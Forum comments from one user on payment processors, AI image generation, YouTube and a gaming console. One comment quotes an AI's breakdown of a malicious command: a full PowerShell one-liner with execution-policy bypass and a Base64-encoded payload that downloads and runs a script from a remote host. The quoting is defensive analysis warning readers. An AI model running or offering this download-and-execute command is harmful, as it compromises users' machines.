

My understanding is part of it is that payment processor says stop doing it or we drop you all together. Not a we won’t be involved but lose them as an avenue.
Their way or highway, no real middle ground posible


My understanding is part of it is that payment processor says stop doing it or we drop you all together. Not a we won’t be involved but lose them as an avenue.
Their way or highway, no real middle ground posible


One of the moments that Ai can be good. I asked googled gemni
This command is highly malicious and is designed to execute a script downloaded from a remote server. Here’s a breakdown of what each part does:
- conhost cmd /c: This part starts a new command prompt window (cmd) and then immediately executes the following command (/c) within it. conhost is a legitimate Windows process, but here it’s being used as a wrapper.
- powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: This is the core malicious part.
- powershell: Invokes the PowerShell interpreter.
- /ep bypass: This is crucial. /ep stands for “execution policy.” bypass tells PowerShell to bypass its execution policy, meaning it will run any script regardless of the local security settings that might otherwise prevent untrusted scripts from running. This is a common tactic for malware.
- /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQBhAC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: The /e switch indicates that the following string is an encoded command. The string JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA== is a Base64 encoded string. Let’s decode the Base64 string to see the actual PowerShell command: Decoded PowerShell command: $site = Invoke-RestMethod ‘https: //mastraw.top/me/day’; iex $site Now we can fully understand the malicious intent:
- $site = Invoke-RestMethod ‘# https: //mastraw.top/me/day’: This command uses Invoke-RestMethod to download content from the URL ‘https://mastraw/. top/me/day’ . This URL is likely hosting a malicious PowerShell script or some other form of executable code.
- ; iex $site: The semicolon acts as a command separator. iex is an alias for Invoke-Expression. This command takes the content downloaded from ‘https://mastraw.top/. /me/day’ (which is stored in the $site variable) and executes it directly as a PowerShell command. In summary, this command is designed to:
- Bypass PowerShell’s security restrictions.
- Download a script from a specific remote website ‘(https. ://mastraw.top/me/day)’ .
- Immediately execute that downloaded script on the victim’s computer. The content of the script downloaded from’ https :// mastraw.top/me/day’ is unknown without accessing that URL, but given the nature of this command, it’s almost certainly malicious. It could be anything from a ransomware dropper, a keylogger, a remote access trojan (RAT), or a cryptocurrency miner. If you encountered this on a computer, it is highly compromised and should be immediately isolated from the network and professionally cleaned or reimaged.
Edit:added back tick to urls


It is a mine field. The fact that it can generate almost an exact copy of some things if it’s over trained on an image or if the stars hit just right
On a different not llm is Large Language Model not the image generator


Why I throw my phone browser into desktop mode. Can be annoying but it works most the time
One thing to keep in mind beyond hosting cost is the uploader making money. YouTubes partner or paid channel things work (there are complaints) it’s a LOT harder to replace those freeas add revenue pays them
The sad thing is most the ones who would criticize it, are not the target audience. I have my gaming computer set up to be able to play to our living room when we want to. So the gabecube for me is not as good as a purchase (debating the controler though)
For someone who wants to play in their living room or about due a new gaming pc, it’s going to be the best thing for them.